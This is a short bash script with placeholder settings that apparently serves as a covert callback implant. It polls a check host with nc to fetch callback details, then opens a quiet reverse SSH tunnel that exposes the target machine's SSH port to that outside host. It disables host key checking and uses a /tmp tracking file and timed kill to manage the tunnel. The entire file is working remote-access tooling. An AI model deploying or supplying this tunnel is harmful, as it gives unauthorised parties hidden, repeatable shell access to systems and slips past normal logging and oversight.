#!/bin/bash
REMUSR=user
TARUSR=<target_user>
TARSSH=<target_ssh_port>
CHK_IPs="<CHK_IP(s)>"
CHK_PORT=<CHK_PORT>
KEY="<location_to_key>"
TRACK_FILE="/tmp/ssh"
SLEEP=120

get_value () {
echo $INFO | cut -f $1 -d ":"
}
if [ -f "$TRACK_FILE" ]; then
	exit
fi
for LIVEHOST in $CHK_IPs;
do
	INFO=$(nc -nw1 $LIVEHOST $CHK_PORT)
#	INFO=$(wget --timeout=1 --tries=1 -qO- -o /dev/null $LIVEHOST:$CHK_PORT)
#	INFO=$(perl -MLWP::Simple -e "getprint('http://$LIVEHOST:$CHK_PORT')")
	if [ $? -eq 0 ]; then
		CB_PORT=$(get_value 1)
		CB_IP=$(get_value 2)
		REMLIS=$(get_value 3)
		if [ -z "$CB_PORT" ] || [ -z "$CB_IP" ] || [ -z "$REMLIS" ]; then
			exit
		else
			touch $TRACK_FILE
			ssh -o LogLevel=quiet -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -p ${CB_PORT} -R 127.0.0.1:${REMLIS}:127.0.0.1:${TARSSH} -i $KEY -N ${CB_IP} -l ${REMUSR} &
			SSH_PID=$(ss -tuanp | egrep "$CB_IP":"$CB_PORT" | egrep -o "pid=[0-9]+" | cut -d "=" -f 2)
#			SSH_PID=$(netstat -tuanp | egrep "$CB_IP":"$CB_PORT" | egrep -o "EST.*[0-9]+" | cut -d " " -f 2)
			sleep $SLEEP && rm -f $TRACK_FILE && kill -9 $SSH_PID && wait $! 2>/dev/null
		fi
	fi
done
